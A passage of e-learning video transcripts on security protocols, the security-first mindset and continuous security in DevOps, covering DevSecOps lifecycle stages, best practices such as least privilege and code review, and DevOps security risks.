connecting or attempting to connect to a particular host or a server, that can be
authenticated with the help of a security protocol. And, of course, because if your
data is encrypted, if your data is secured, then you can prevent unauthorized access
to the data. So some of these examples of security protocols are Secure File
Transfer, which is SFTP, Secure Hypertext Transfer Protocol, which is HTTPS,
and Secure Socket Layer, which is SSL.
Importance of Security Protocols
[Video description begins] Topic title: Importance of Security Protocols. The
presenter is Ashish Chugh. [Video description ends]
Let's now learn about the importance of security protocols. So security protocols
help you prevent the loss of data integrity. Now if you take the example of
OpenPGP or S/MIME which help you encrypt the emails. Now imagine if these
emails were carrying confidential data and they were in transit. They could have
been sniffed by anybody who's got access to the network or if these emails were
flowing over the Internet and they were not encrypted. Think about it, you could
lose all your confidential and sensitive data. Therefore, with the help of the security
protocols, you can prevent the loss of data integrity.
Similarly, now if you're using the security protocol to ensure the data is secure you
are allowing only the limited number of users who have access to that particular
data to access it. Which means if you do not have access to that particular folder on
a network, then the user will not be able to access it. Because you could simply
encrypt the data and allow access only to few individuals.
Now if those users who do not have access to this, they will not be able to see. A
simple example could be you encrypt your own laptop using BitLocker. Now when
you encrypt it, unless or until you know the password and you have the private key
of the encryption, nobody else can access that data. It is only you who's preventing
the data, not only the confidentiality, but also the integrity. And because you are
able to protect the data integrity and confidentiality, you're also protecting data
breaches and thefts.
Let's assume your system is encrypted, your laptop is encrypted. Now if somebody
steals your laptop, what happens? It is gone with all the information you have, but
you need not worry because information is encrypted. It probably won't be possible
for that person to break that encryption and recover the data. And of course, with
the use of TLS in web applications, you can prevent attacks like man-in-the-middle
and sniffing. When you're using HTTP and somebody enters the user credentials in
the login page, anybody can sniff that. And if you're making a transaction while the
web application is still on HTTP, anybody can perform the MITM attack, which is
man-in-the-middle. Now if you've used HTTPS, both these types of attacks can be
prevented.
Now when you're talking about data at rest, it is the data in storage when it is in
transit. Which means the data is going from your system or one system to the
remote host, it could be on the Internet, it could be on the intranet. You need not
worry as much when the data is in transit on the intranet, but on the Internet, you
definitely do not want to send information in clear text. And if you are doing that,
you are just inviting trouble. Therefore, it is always best to use a security protocol
to encrypt that information and send it. For instance, you can use SSH to create an
encrypted channel and send the data. And you can also secure communication
between two devices using SSH. Or you could also use IPsec to create encrypted
tunnels between two hosts, one could be yours and one could be the remote host.
The Security-First Mindset
[Video description begins] Topic title: The Security-First Mindset. The presenter is
Ashish Chugh. [Video description ends]
Little earlier, we talked about security protocols, we talked about, why should they
be used, what are their features, what are their benefits? Now, before we even get to
the security protocols and their implementations, we need to have something called
security first mindset. Now, what is this security first mindset all about? One, it
unifies security and compliance. Which means not only helps you implement
security, but it also ensures your devices, and your network, and your infrastructure
is compliant to that particular security that you had implemented. For instance, you
might be pursuing for PCI DSS certification, which is a compliance framework.
Now, if you do not implement enough security and ensure that your devices and
your infrastructure is compliant, you'll never get that certification or you will never
be able to comply with PCI DSS. Therefore, you have to ensure both security and
compliance are unified. Now, when you talk about security first mindset, it also
strengthens the security posture. Because if you're not talking about security, if you
are not thinking about security in your organization, then there is no way security
will become the most critical point of your organization. Now, if that is not there,
then of course, the security posture will be missing because security would be one
of those things that you have to do it. And that is not what security first mindset is
all about. It encourages everyone to play key role. So everybody, right from the
senior management to the last employee in the hierarchy, everybody has to think
from security perspective.
The role they are playing in their organization will vary. Therefore, the
responsibilities they will have in security first mindset in your organization will
differ. For instance, a user lower in the hierarchy would have to comply to certain
rules and regulations. However, the senior management will have a critical role to
play when implementing security first mindset. Because they have to not only make
strategic decisioning, but also they have to set an example in front of the other
users. They have to think from security perspective. So and they have to ensure that
security is the highest priority for everybody in the organization.
Now, when you have security as your first priority and the highest priority, it can
be ensured that it will keep your business running safely. Given the today's
environment on the Internet, there are thousands of malware being created every
day. There are new hackers are coming in. Then there are people who are just
hungry for not only information, but they are hungry to steal that information and
sell it out in the black market. Which is known as the underground web or dark
web. So therefore, to ensure that everybody is sensitive about security, you have to
ensure that it drills down from top to bottom. With this approach, it will keep your
business running safely.
You will also have to bring innovation in keeping information safe, you cannot live
with outdated security infrastructure. There are new malware coming, there are new
threats that are coming up every day. So you will have to keep evolving your
infrastructure. You have to be innovative. Think like a hacker, then only you can
tackle a hacker. Otherwise, if you're two steps behind the hacker, then there is no
way you can keep your information safe. So what does security first mindset
require? So it has to be integrated with multiple components in your organization.
It has to start with your business vision and mission. So your business vision and
mission, while they are focusing on the business of the organization, they also have
to tackle the security problem. Because if your organization is wanting to grow and
ensure data safety, then they have to start aligning their business vision and mission
with security.
Then comes the people. Now, people are the most critical point in the security
chain. They are the ones that are also the weakest point in the security chain.
Therefore, people have to be trained properly in the security domain. They have to
be made aware of the basic level of threats and how to mitigate them. And trainings
that you provide to the users cannot be one time. They have to be ongoing, as in
when there is a change in the security posture in your organization, you've to ensure
that users are trained. Then comes the processes and procedures. Many
organizations do not align their processes and procedures with security.
You've to ensure any process or procedure running in your organization has to be
looked at from the security point of view. For instance, your client requires data to
be uploaded on FTP. Now, that is confidential data the client is asking you to
upload in FTP server. Now, if your process allows you to upload that data and the
security is not looked at when uploading the data, anything can happen. Anybody
can sort of hack the FTP server and take away the data. So therefore, one process or
procedure could be you will not use the FTP server. There is a in house FTPS
server that has been implemented, you can use that to upload data. So therefore,
now you have ensured that process and procedures are aligned with security. You
have to also ensure it is not only your organization, but also the partners that you're
dealing with. If your partners are not equipped with enough security and they're
connecting with your network, be assured that sooner or later hackers are going to
come to your network as well. And it will not be your fault, but it will be the
partner who has invited the trouble.
Your various organizational units. Every organization has multiple organizational
units. So each organizational unit may have different security problems, may have
different security needs. You have to ensure that they are tackled. Your marketing
and sales team. They have to be also updated with the latest security posture. And
they have to be also appraised of what is going on within the organization, as far as
security is concerned. So in totality, if you look at you have covered most of the
aspects of an organization. And if you integrate all of them with security, then you
are talking about the security first mindset. But how do you implement security
first mindset?
[Video description begins] Security-first Mindset - How? [Video description ends]
The biggest question is, how? And the easiest answer is, make sure your security
decisions are taken early on. Which means every project you do, every new process
you implement, every change in the infrastructure you make, you make sure you
consider security. You have to ensure security is integrated in any decisioning that
you make. It cannot be that you have set up a new network, but you have not
thought of security. After implementing the network, you're talking about security,
how do I secure this network? It is not going to work.
First you have to think about the security, then you have to implement the network.
Therefore, you'll be able to make the right decision at the right time. You've to also
ensure security is tightly integrated into your business, just like the good old era
security cannot be isolated anymore, it cannot run in silos. Your business has to
integrate security tightly, which means your top management or the senior
leadership has to start talking about the security. If they want to secure the business
and its information. And it is also important, even though you may not be required
to opt for a compliance program. But it is also equally important that you should
align your security policies and everything to a compliance program, even though
you don’t go and get yourself certified. But being compliant is always good. This is
because your partners, your vendors, your clients will have more trust in you if you
have complied to a security standard. Maybe it could be PCI DSS if you are into
credit card transactions or it could be as generic as ISO 27001. Depending on your
requirement, make sure you have compliance implemented within your
organization.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of security protocols and
to learn how they play a key role in network security. We did this by covering the
common protocols and their security vulnerabilities. We also looked at the risks
around certain networking protocols, but security protocols as a replacement of the
legacy ones. Moving on, we also looked at security protocols and their usages.
Finally at the end, we also looked at the importance of security-first mindset. In our
next course, we will move on to explore the hardened security topologies and their
importance
Information Security: Continual
Infrastructure Testing
Discover DevOps practices such as continuous security and security monitoring,
the benefits of using DevOps, and best practices of DevOps security in this 11video course. Explore the secure DevOps lifecycle and learn about security risks
and the various tools used for DevOps testing. Key concepts covered in this course
include continuous security practices and the need for continuous security in a
DevOps environment; the benefits of using DevOps including improved quality,
saving money, and saving time by not having to integrate code at the later stage;
and the components of DevOps and their impact on the infrastructure security.
Next, learners will examine the best practices of DevOps security and learn the
secure DevOps lifecycle; and learn security risks that come with DevOps and tools
that can help aid with continuous security infrastructure testing. Finally, learn the
security risks of DevOps; and the various tools used for DevOps testing, as in each
stage of DevOps certain types of tools will be used.
Course Overview https://www.netapp.com/nl/devopssolutions/what-is-devops/
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Ashish has 25 years of experience in IT infrastructure operations, software
development, cybersecurity, and e-learning. In the past, he has worked as quality
assurance team leader, technical specialist, IT operations manager, Associate Vice
President software development, Deputy Director, and Delivery Head Software
Development.
He's currently working as IT and cybersecurity consultant. With Bachelor's degree
in Psychology and Diploma in System Management, Ashish has an expertise in IT
operations and process management. Ashish has various certifications which are,
certified network defender, certified ethical hacker, computer hacking forensic
investigator, MCSC, MCB and CLP.
In this course, you will learn about the concept of continuous security practices.
You will also learn how continuous security has become more important with the
popularity of DevOps. This course will also cover key components of DevOps and
their impact on the infrastructure security. This course will also help you identify
some of the security risks that come with DevOps and the tools that can help you
aid continuous security infrastructure testing.
Continuous Security Practices Introduction
[Video description begins] Topic title: Continuous Security Practices Introduction.
The presenter is Ashish Chugh. [Video description ends]
DevOps, the problem. One of the fundamental problem with DevOps is that they do
the development at very fast pace. And due to this, there is a continuous push of
code into a central repository. Now because the continuous push of code is
happening, there is no testing that is happening on the code. And this is because
there is no synchronization with the security team. They keep the security team out
till the last stage before the deployment. Now, security team does not know what is
being pushed into the existing code. And DevOps team has a fundamental problem
that they have to develop the code at very fast pace. Due to which they keep on
pushing the code into the existing code and continue with the development.
Once the development is done, then the security team gets involved. But, however,
remember this is the last stage before the final deployment into production. At this
stage, if security team finds lot of bugs or security loopholes, there is a lot of
rework that needs to be done. And therefore, another fundamental problem that
with the DevOps is security team is not agile as the development team. This is
because security team has set norms against which they are going to check the
code. Which is not okay with the DevOps team in most cases because the testing
time can also delay the development time.
[Video description begins] DevSecOps - The Solution. [Video description ends]
So in the previous slide, we looked at the problems of the DevOps. Now, how do
you overcome the DevOps problems? So you have something called DevSecOps
which is the DevOps plus security. The solution to the DevOps problems is that
you need to integrate security into every build that is getting checked in into the
centralized repository. The only solution to the DevOps problem is that the security
team needs to be integrated into every release that is happening from the DevOps
teams. They should be checking each and every build. Whether it happens on daily
basis or on alternate days, it does not matter. But every build, every release needs
to be checked by the security team.
The security team can perform different levels of testing. It could be static code
review. It could be dynamic security tests. It could be software composition
analysis. It could also be platform vulnerability analysis. It could also be existing
code analysis, which could be vulnerability assessment. Or it could be anything
else, as long as there are levels of test happening at every piece of code, the
DevOps solution can work. So what is continuous security? Continuous security is
the integration of security tools in continuous development. Now, why would you
want to do that? This is because at every release, every build, you want to ensure
that whatever is being released or built, it's safe for the rollout. It's safe to go in the
production environment. There are no vulnerabilities, there are no security
loopholes that are left out in the application.
You also want to do penetration testing at periodic intervals. Penetration testing is
not something that you can do once and then not do it again. You would need to
perform penetration testing at multiple intervals just to ensure that every piece of
code that is getting into the application is safe and secure. You also want to
integrate automated security tools into DevOps development. You want to
automate them, you want to ensure that there is less of manual work. There is more
of automated testing that goes on so that the security team is free to do lot many
more tasks, than just simply sit and test the application.
Continuous security needs to be automated, it needs to be autonomous, integrated,
scalable, and repeatable. So for instance, if you take the example of repeatable. If
there is one type of testing that has already been done on the application, if you
need to repeat it, you should not have to redo everything to redo that testing. So
that testing itself should be repeatable. So now, if you look at the broad level
DevOps life cycle. So, there is an idea which is planning. Then there is design.
Then there is coding. Then there is testing and then deployment. Now, in the entire
broad level DevOps life cycle there is nothing that has to be done with the security.
So with the continuous security, you embed security at every point that is
necessary.
So for instance between idea and design you would do risk assessment. You would
see okay, what are the risks that are possible? Then after the design you want to do
design review to ensure that the design is appropriate, it meets the security
requirements. Then after coding, you want to do code review, you want to do static
code review. Or maybe you want to do automated code review, and to find out
where what are the security flaws, whether the coding has been done as per the
standards define by the organization. And before you deploy the application, you
want to do penetration testing. This will actually give you insight of the security
loopholes that are available in the application.
[Video description begins] Continuous Security Practices. [Video description ends]
There are certain continuous security practices that you should follow. This is not
an exhaustive list, but these are some of the key guidelines that you should follow.
So, for instance, implement security governance policies, your organization must
have security governance in place. If that is missing, then it is very difficult to
integrate continuous security because the governance will define how things should
run, and what are the things that you need to watch out for. You also need to embed
security into DevOps lifecycle.
Later in the course, we'll also see how security is embedded into DevOps. You
need to ensure there is a vulnerability assessment of the application that is
happening. You need to automate as much as possible and reduce human
intervention. Remember, more human intervention, more errors, less human
intervention, more automation, less errors. Then you also need to run security tests,
at every given point, you need to ensure there are certain security tests that are
happening. And you need to see the results, you need to accordingly fix the code
and the application based on the output of these tests. You also need to segment the
DevOps network. They should be completely segregated from the production
network. They do not need to be on the same network.
Remember there things that they will be doing, which probably will not be suitable
for the rest of the network. They will have their code. They will have their login
credentials. They will have everything into a central repository. You do not want
any other employee to mishandle their code and the credentials. You also need to
ensure that the developers are given minimum set of privileges. Everybody does
not need root or admin access. Give them the bare minimum privileges to work
with whatever is required, nothing more than that.
Continuous Security in DevOps Environment
[Video description begins] Topic title: Continuous Security in DevOps
Environment. The presenter is Ashish Chugh. [Video description ends]
Continuous security in DevOps environment. The reason you would want to
integrate continuous security in DevOps environment is because you want to ensure
the confidentiality, integrity, and availability of information. You do not want the
application to be breached and then the information is lost or stolen by a hacker.
Therefore, you have to ensure that confidentiality, integrity, and availability are
integrated tightly into the application.
You also need to include accountability. Accountability is something verifying who
has what level of access and who has done what on the network. Integrate tighter
security of the network, make sure that you have enough security devices in place
and the network is properly protected. You also need to ensure that information is
protected in all aspects. If you protect the CIA, then you are able to protect the
information from all corners.
[Video description begins] Designing Goals for Continuous Security. [Video
description ends]
Now when you talk about confidentiality, it is something about information that
should be accessed only by the authorized person. So if the information is being
accessed by unauthorized person, then the information has lost its confidentiality.
Integrity implies ensuring accuracy, reliability, and completeness of information.
Availability implies, providing access to information as and when requested or
required. Accountability implies, verifying who have access the information and
who has done what with the application.
Importance of Continuous Security
[Video description begins] Topic title: Importance of Continuous Security. The
presenter is Ashish Chugh. [Video description ends]
Importance of Continuous Security. Most often, when the developers develop an
application, security is not the end goal. However, when you bring continuous
security into the picture, you need to ensure there is end-to-end security with the
application. Right from the planning stage till the deployment stage, you need to
ensure there are enough security checks in place to ensure that application has no
security loopholes. With the integration of continuous security, because you are
testing the application at every stage, at every build, every release.
You reduce the number of security loopholes, which eventually lead to reduction in
number of security breaches. And of course, because there are lesser errors in the
application, that also lowers the cost of development and fixing. So you are able to
do the right thing in the first attempt. Just imagine a scenario, if you launch an
application without continuous security integration. Application gets rolled out but
there are enough errors in the application which attracts a hacker. The hacker is
able to compromise the application. He's able to get into the application and take
control.
Now, imagine fixing that error will cost you hundreds and thousands of dollars. If
you had done the same thing earlier, if you had done enough testing internally with
the help of continuous security, you would have been able to save this cost.
Because continuous security allows you to do security checks at different phases,
you're able to speed up the development and delivery. You're able to fix one thing
and then move to the other one. This also helps you bring scalability of the
application, availability, and resiliency.
[Video description begins] Continuous Security - Enablement. [Video description
ends]
So how do you enable continuous security? So first and the foremost thumb rule is,
you implement smaller and gradual changes. Do not try to fix everything. Do not
try to implement everything at one go. Make smaller changes and implement them.
Bring in security automation tools. Manual testing is good. It might catch more
errors, but the problem is it is also prone to human error. Therefore, security
automation tool integration is always a good thing to do. You should also enable
security alerts for security incidents. So if the application has a security breach,
then there should be a security alert that should alarm the security team that
something has happened. So that they can take quick action.
Use automation to find security loopholes. There are enough tools in penetration
testing, vulnerability assessment. You can use multiple automation tools to find the
security loopholes. And once you find the security loopholes, you have to ensure
that you fix all of them. It might be a small security loophole which you think does
not make an impact. But hacker, remember, just needs one entry point to get into
the application. And rest, he will be able to manage on his own. So therefore, fix
everything that is considered to be a security loophole.
[Video description begins] Continuous Security - Best Practices. [Video
description ends]
So what are the continuous security best practices? You should not use admin
logins or logins with lot of privileges on the system. So therefore, it is always
advisable to use a regular user for development. You should integrate security right
from the first stage which is planning. Until the time application is deployed in
production, you should not exclude security. Remember, security can never be an
afterthought. It has to be integrated right from the start. You should also enable
logging. And this is you want to do because you want to track errors. If you do not
track errors, you're going to miss them out. One error that is left in the application
can be very costly for the organization. The hacker needs just one vulnerability to
exploit the application, and then eventually take control of it or do something with
the data.
You should also focus on processes. You do not need to make all improvements at
once. You have to make gradual improvements. Ensure there are continuous
improvements happening in the application. Because as and when you find errors,
as and when testing will go on, as and when there will be security checks, you will
continue to find more and more errors. And those you need to fix. So therefore,
gradually make continuous improvements. You should also keep a balance between
security and simplicity. Now, this is a typical problem that happens with most of
the organizations, who integrate continuous security. They tend to get carried away.
In integrating security, to an extent, the application loses its simplicity. You have to
ensure there is a right balance. Because at the end of the day, if the user is not able
to use your application, then the application is useless. So you have to ensure not
only application is simple, it is user friendly. But there is enough security checks
that are happening to ensure the data security.
Benefits of Using DevOps
[Video description begins] Topic title: Benefits of Using DevOps. The presenter is
Ashish Chugh. [Video description ends]
Benefits of using DevOps. Now when you use DevOps in software development,
there are certain benefits that you will gain. One is improved quality, because
everybody is tightly integrating the code into a central repository, so there is
improved quality of code. You save time and money in terms of not having to
integrate code at the later stage, and everybody is working in isolation. Therefore,
you save lot of time, and then you save lot of costs. Because everything is getting
centralized in DevOps, it helps you increase maintainability. You are able to
maintain your code better. Because there are continuous releases, there are
continuous builds that are happening, so it helps you faster time to market. There
are developers for checking in the code after every piece that gets developed.
So therefore, your application is ready in much shorter time, than in a normal
software development life cycle. Increased reliability, because everything is
centralized, every piece of code is collated in one place. So you do not have the fear
of losing code from one developer or another developer. So the reliability of the
code is much better in a centralized location that is being used in DevOps. Then
you have improved scalability. You are able to scale up your application because
there are continuous builds, there are continuous releases, you keep on adding more
and more component into the application that helps you improve scalability of the
application. Higher stability, because the application is continuously getting built.
The code is collated in one single place. And there are testing that is happening at
the final stage, so it brings better stability. Increased productivity.
Now that developers do not need to keep their code isolated, they are checking in,
there are releases happening every day, every hour depending on how you're
executing your DevOps life cycle. So that increases the productivity. You do not
have to wait for one developer to finish the code and then compile it. You can take
the code, whatever has been checked in, build it and move on. Increased innovation
is another benefit of DevOps. Then, the final is reduced development life cycle,
because there are continuous releases, there are continuous builds that are getting
checked in. Now, the DevOps overall life cycle becomes much shorter and this is
the reason DevOps came into existence, because the typical life cycle of an
application is much longer. But DevOps puts it on a spin and allows the application
development to happen in a much shorter time.
Then DevOps also brings higher efficiency, better reliability, faster updates. Faster
updates because there are continuous releases, continuous builds so you can, let's
say for example, if you find an error, you can quickly release a new build and
update the application. This, because you're able to release much faster, it also
helps user experience to be increased. If your user see that there is a problem with
the application and you do a faster update, then of course, the user is going to be
happy. Therefore, it brings in increased user experience. Reduced failures, because
you are able to update the application on continuous manner, then it also reduces
the failure. DevOps also has automation integration in development. So you are
able to automate a lot of things, and therefore, the development time is much
shorter.
Reduced backup complexity, because everything is stored in a centralized
repository, there is a reduced backup complexity. All you have to do is backup the
code at one place, that's all. DevOps also provides the benefit of increased
infrastructure orchestration, which can be done using Chef or Puppet. You can also
perform resource utilization monitoring. Now, who has done how much of work?
Who's busy? Who's not? How much data is getting fed into the centralized
repository? You can monitor all these resources, you can monitor your team like
that. Now, as far as the software and the hardware resource utilization goes, you
can see which server or which platform is busy and how much utilization of the
system resources is being done.
At the end, one of the biggest benefits of DevOps is, there is a faster time-tomarket. Because once you have the code in place in a centralized repository, you
can do one-click deployment and release the application.
Continuous Security Monitoring
[Video description begins] Topic title: Continuous Security Monitoring. The
presenter is Ashish Chugh. [Video description ends]
Security Monitoring - Traditional. In the traditional method of security monitoring,
the tests were conducted only at the final stage of the product development. So
which meant, before the application is rolled out in the production, the security
team will go and test out the application. Now the biggest drawback in this
methodology was if there are too many security loopholes, then either you will
release the application with the security loopholes. Or you will halt the deployment
till all the security loopholes are fixed. Also in the traditional way, the focus was on
the application development rather than security. Therefore, the security team was
only involved at the last stage.
Now, if there are too many issues, there are too many bugs in the application, then
the developers will have to rework at the final stage. So which means you will have
to halt the application deployment. In most cases, whenever there was a security
loophole was found, the developers used to quickly release a patch and fix up that
security loophole. This was the traditional method. However, this kind of method
does not work in the long run because that patch might have fixed that particular
vulnerability. But it might have opened another one. However, that has been the
preferred method in the traditional security monitoring.
[Video description begins] Continuous Security Monitoring - Present. [Video
description ends]
Now let's look at how continuous security monitoring is happening at present. So
there is a focus on security defect metrics. So you figure out how many security
loopholes have been found, how many have been fixed. How many builds have
failed, how many builds have passed, and so on. So this is not an exhaustive list,
but it depends from organization to organization how they define their security
defect metrics. And it also gives an insight to the developers how many mistakes
they are making. So it helps in both ways. The security team is able to track the
data. But developers are also able to gain insight to the number of defects they're
introducing. It also includes vulnerability assessment on continuous basis. So as
and when there are builds getting deployed, you can do vulnerability assessment at
each stage.
This is to ensure that you proactively address potential security issues. So in the
vulnerability assessment, when you find a security issue, you are able to deal with
it right then and there, rather than waiting for the entire build to be complete and
then rolled out. You can also define what you want to monitor. Your focus might
be only on a specific portion of the application. You may not want to test the entire
application again. So it helps you define what do you want to monitor.
And along with that, then you can have audits and control monitoring taking place
in the background. You can do regular audits and see what has been fixed, what has
not been fixed. If something that has not been fixed, why it has not been fixed. So
you can also monitor the application that has gone live. There is a continuous
monitoring that is happening and you are able to see you know how the application
is performing.
DevOps Security Best Practices
[Video description begins] Topic title: DevOps Security Best Practices. The
presenter is Ashish Chugh. [Video description ends]
DevOps security best practices. DevOps security has certain best practices that you
should follow. These are as follows. You should review the code in smaller size,
never tend to review code which is very large. And you want to review the entire
application at one go. Do not make that mistake, review the codes in bits and
pieces, so that you are able to review it properly. You should also implement
change management process. Now, as and when there are changes taking place in
the application, which is already in the deployment stage. You do not want
developers to keep adding code to it, or add or remove features.
So therefore, the only thing that can help you at this stage is you should implement
the change management process. So every change that needs to be made to the
application should go through the change management process. Once it is
approved, then the developer should be allowed to make change. Several
organizations, after putting the application in production, which is the live
environment, do not review the application. As per the DevOps security best
practice, you should review the application on continuous basis. You should keep
reviewing its code. You should keep doing a lot of security tests to ensure that no
new security loopholes have been introduced.
[Video description begins] You should keep evaluating applications in
production. [Video description ends]
Own the security best practices and the security guidelines, you should also train
the development team on security best practices. So for instance if a new developer
has joined the team and he or she does not know about SQL injection. Then you
have to ensure that the developer is aware what SQL injection is, what is that it
does, and what kind of harm it can cause to the application. You may not want to
go into technicality of this. But however, at the broad level you need to ensure that
development team is updated with the new security norms, guidelines, and best
practices. You should also develop security processes and implement. Of course,
security itself cannot run without processes.
You need to have specific security processes in your organization and then
implement them. And after the implementation, there would be possibilities that
you would have to revise the processes. Because certain things did not work as
anticipated, or the process was too complicated, there could be any reason. So you
would have to revise these security processes. But whatever is done, you have to
ensure after the implementation, security processes are being monitored and they
are being audited. You should also implement a DevOps plus security model,
which is known as DevSecOps. So along with DevOps, you would also include
security in this model.
Later in the course, we will also look at the DevSecOps model. You should also
implement security governance. Remember, governance is a must thing to do when
you're talking about security. You need to monitor, you need to ensure everything
is running as it's supposed to be running. Use DevOps security automation tools.
Avoid the manual work, bring the automation tools into the picture. So that with
the automation tools, not only you can do the testing, but you can also build
repeatable tests against an application. You should also implement vulnerability
assessment. This needs to be done on frequent basis and whatever security
loopholes are found, then you have to fix them. You should also implement
configuration management.
In the previous slide, we talked about building change management process. Now
change management process is also part of configuration management. So you need
to ensure what configuration you're dealing with, what changes are happening in
the application, who's authorizing them, who's approving them. So all this will fall
under configuration management. In the DevOps security best practices, one of the
key thumb rule is that you should use the least privilege model. Never give more
privileges to a developer than required. So if you do not require them to have root
or admin access, do not give them. Give them a regular user access so that they can
work.
You should also segregate the DevOps network. We have already looked at this
point in one of the previous slides. Use privilege password management. You
should ensure that privilege passwords in the DevOps life-cycle are secure. Under
no circumstances these passwords should be shared with the other users or should
get compromised. You should also implement auditing and review. This needs to
be done on continuous basis. There should be regular audits, not only of the
application, but also of the environment of the security processes and the data that
it collates.
Secure DevOps Lifecycle
[Video description begins] Topic title: Secure DevOps Lifecycle. The presenter is
Ashish Chugh. [Video description ends]
DevOps Lifecycle, there are three teams that are involved in DevOps Lifecycle.
You have software engineering, quality assurance, and technology operations.
Software engineering is responsible for developing the software. Quality assurance
is responsible for testing and quality assurance, technology operations is typically
responsible for deploying the application.
[Video description begins] Secure DevOps Lifecycle. [Video description ends]
Now in the secure DevOps lifecycle, along with software engineering, quality
assurance, and technology operations, you add another team which is security. So
when you add security, it becomes Secure DevOps Lifecycle. So you have now
four teams, software engineering, quality assurance, technology operations, and
security. In the Secure DevOps Lifecycle, you have five different stages. You have
pre-commit, you have commit, which includes continuous integration. So even
though you do commit, then you keep on adding more and more components in the
application, or more and more code is getting merged with the existing code. Then
you have acceptance, which means continuous delivery. Deliveries happening after
every stage, after every commit, there is a continuous acceptance that is taking
place.
Then you come to the production stage, which is continuous deployment. There is
code that is getting merged in the existing code. There is acceptance happening.
And then there is continuous deployment that is taking place. And finally, you
operate the application. So let's look at each of these phases in detail. So when you
talk about pre-commit, you have performed security assessments such as threat
modeling, and vulnerability assessment before the code is getting deployed. So
which means even before the code is pre-committed, it is tested out for threat
modeling, and vulnerability assessment. When you talk about commit, there are
security checks happening which could be static code analysis, which could be
security unit tests.
There is, again, vulnerability assessment happening during automated builds. In the
acceptance phase, there is automated security acceptance. And there are functional
tests that are being executed. Then there are infrastructure scanners and application
security scanners which scan the application and the infrastructure to ensure there
are no security loopholes. Then you get to the production stage. Again, there are
security checks at this time. They will be happening earlier, and even after the code
is being deployed. In the operate phase, you continue to run monitoring and
auditing of the production system, so which means even if the application is live,
you are continuously monitoring it and auditing it for security loopholes.
Mapping to the previous slide. Now this is the entire lifecycle of Secure DevOps.
So you start with inception threat modeling, in continuation to the previous slide,
this diagram describes the entire secure DevOps lifecycle. So you start with
inception, at that stage, you do threat modeling. Then you do project configuration,
again, you harden the environment, which could be operating system and the
infrastructure.
[Video description begins] Project configuration +SECURED/HARDENED
ENVIRONMENTS. [Video description ends]
Then you code, you commit. At this stage then there is a code review that happens.
And this code is pretty much security focused code review. In which you analyze
the code, trying to find out vulnerabilities which could impact the application. So
for instance, you might want to check out the code for SQL injection. So you would
do such reviews and figure out security loopholes. Then you would perform
continuous integration. Along with that, you would also do continuous integration
testing, and also involve automated security testing. Then you do continuous
deployment.
[Video description begins] QA/INTEGRATION TESTING +ADDITIONAL
SECURITY TESTING. [Video description ends]
There is QA integration tests happening at this stage before the transition happens.
Then there is a security review of the application, which is the acceptance testing.
And finally, you transition the application into the production stage.
DevOps Security Risks
[Video description begins] Topic title: DevOps Security Risks. The presenter is
Ashish Chugh. [Video description ends]
DevOps security risks. Even though DevOps is a good concept, and a lot of
organizations are using it, there are certain security risks that are assigned to it. So
for instance, there is no fixed access management specifications defined. The
DevOps concept does not have any kind of specific access management
specification. So every organization tends to use its own access management
specifications, which could be good, or which could be bad either. Therefore, the
lack of access management specifications can be a big risk in DevOps life cycle.
Attack surface is much larger in the DevOps scenario. This is because there is no
integration with the security. The entire concept of testing the application at each
stage is missing.
For example, you are doing continuous commits. Now, you do not know what kind
of code is being committed in the existing code. Therefore, if the new piece of code
has security issues, it can bring down the entire application. Privileged accounts
and logins are stored in central repository. That is correct, because if you're using
applications that allow you to merge the application, allow you to work in a single
platform. Even though there are multiple users are involved, you are committing
and checking out the code or checking in the code. Then, the application has the
privileged accounts and logins in a centralized repository. This is because you have
to log into the application. You have to code right then and there, or check in the
code at the central repository. Therefore, the privileged accounts need to be stored
along with the central repository.
Now, if this central repository is compromised, you lose your privileged accounts
and logins. So you can take an example of Git. If you're doing regular commits, if
Git gets compromised, then you can end up losing all your code, because your
login will get compromised along with it. Automation and orchestration tools can
be a security risk. Because there is no security check happening at any given point
of time in DevOps, automation tools can actually cause risk. You do not know what
is being tested. You do not know what is being deployed. You do not know what is
being developed using automation tools. Therefore, there can be security risks that
can be introduced at any given point of time. There is no strict adherence to
organizational security policy.
Now, this is one of the key risks when you talk about DevOps security. The entire
DevOps life cycle moves at a very fast pace. Even if you have an organizational
security policy, it is not necessary that DevOps team is going to stick to it. This is
because they have a mandate to roll out the application at very fast pace using the
DevOps life cycle practices. Therefore, it is not necessary they are going to stick to
the organizational security policy. Or the norms that have been defined by the
organization. Therefore, this becomes a big risk. Then you talk about code scanning
and configuration checking. Since the DevOps life cycle moves at a very fast pace,
and is much shorter than the typical software development life cycle. Therefore, the
code scanning and configuration checking can be skipped. Which is one of the
critical mistakes that can be made in the DevOps life cycle.
Then you move to the continuous development and delivery. Remember, in the
DevOps life cycle, there is nothing that is being checked. So you are continuously
developing. You're continuously checking in the code. And therefore, there is no
security check happening at any stage. The reason for skipping the code scanning
and configuration is because the DevOps team considers security as a barrier. They
do not want the security checks to happen at every stage. If they do that, then the
entire life cycle of DevOps becomes much longer, which is not agreed by the
DevOps teams. Another issue that also takes place is developers use unknown, selfsigned, and wildcard certificates. All three can cause issue in the application roll
out. Because self-signed certificates are that most of the applications in which you
develop an application and deploy it, they allow you to create self-signed
certificates.
Now, that is not something that you should deploy a live application with.
Similarly, with the wildcard certificates, it's given to the entire domain. So you
could say something like *.microsoft.com. Now, this is a wildcard certificate for
the entire domain. This can also be a security risk. Then, you come to excessive
privileges and shared secrets. Because DevOps team works very closely and they
often tend to share excessive privileges. Or they share their passwords and secrets
with the other team members, it can also be a risk. Such information can also be
misused by one of the team members. Now, as we have discussed earlier, DevOps
development happens at a very fast pace. Therefore, it is quite likely that
vulnerabilities are introduced in the development.
One of the last DevOps security risk can be that malware can be inserted by
continuous integration or continuous deployment tools, such as Chef. So you need
to be very careful. A piece of code can be inserted into the existing code, and then,
the entire application becomes vulnerable.
Tools for DevOps Testing
DevOps Lifecycle. DevOps lifecycle begins with planning.
[Video description begins] Topic title: Tools forDevOps Testing. The presenter is
Ashish Chugh. [Video description ends]
You plan the project, then you code. Which means you program the application that
you have defined in the planning stage. Then you build, you test the application,
you monitor, operate. And finally deploy the application, which is considered to be
a release. Now this completes the entire DevOps lifecycle.
[Video description begins] Tools for DevOps Testing. [Video description ends]
There are certain tools for DevOps testing. At each stage of DevOps, you will use
certain types of tools. So for instance, in planning you can use any project
management application. For instance, you could also use Microsoft Project to plan
out your project. There will be certain stages, there will be resources that will be
